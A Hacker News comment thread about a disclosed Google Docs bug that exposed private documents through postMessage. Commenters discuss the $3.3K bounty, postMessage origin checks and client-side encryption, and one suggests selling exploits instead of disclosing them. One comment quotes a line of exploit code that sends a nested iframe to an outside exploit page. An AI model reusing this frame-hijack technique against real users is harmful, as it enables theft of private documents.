from Hacker News

Stealing private documents through a bug in Google Docs

by hackerpain on 12/28/20, 1:35 PM with 138 comments

  • by jackconsidine on 12/28/20, 6:28 PM

    A few years ago, I built a platform for a client that allowed his customers to show a "Text Me" widget on their websites; the software handled all of the SMS / messaging and basically substituted conventional contact form or Intercom integration.

    His customers used Google AdSense, who started blocking them until they removed the widget. The reason? This widget used an Iframe postMessage, but appropriately specified the singular sandboxed domain. As expected, we never were able to speak with a human at Google- they just sent my clients customers intimidating emails about a security flaw on their websites.

    Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.

  • by xyst on 12/28/20, 2:13 PM

    This was a bug that affected multiple products and even crossed into the enterprise suite and google only rewarded $3.3K USD?

    It’s almost as bad as Apple’s reward program

  • by twiss on 12/28/20, 2:13 PM

    The most surprising part to me is that this works:

        window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
    It's expected to me that you can change `window.frames[0].location`, since you can also change the "src" attribute of the iframe element. But you can't change the "src" attribute of an iframe inside that iframe, if it's not same-origin - so why can you change its location?

    Maybe we should look into whether changing this would break any websites.

  • by diveanon on 12/28/20, 2:43 PM

    To the people publishing these exploits and collecting the trivial bounties.

    Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

  • by mettamage on 12/28/20, 3:05 PM

    Curious question, if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?

    What I'm trying to ask is: does this make the hiring process easier?

  • by random5634 on 12/28/20, 5:44 PM

    Good lord, $3K for this?

    These companies give two craps about security.

  • by paulmendoza on 12/28/20, 1:55 PM

    Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.

  • by konschubert on 12/28/20, 2:04 PM

    Client-side encryption really decreases the attack surfaces of cloud storage solutions.

    It’s really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.

  • by Geeky-cat on 12/29/20, 6:20 AM

    Thanks for going through the write-up. As an author of the bug,considering the the impact, user interaction required and other criteria that need to line up to exploit this bug I feel Google VRP's decision on this bug is accurate.

  • by BlackPlot on 12/28/20, 3:40 PM

    TBO not surprised at all Gdocs had an issue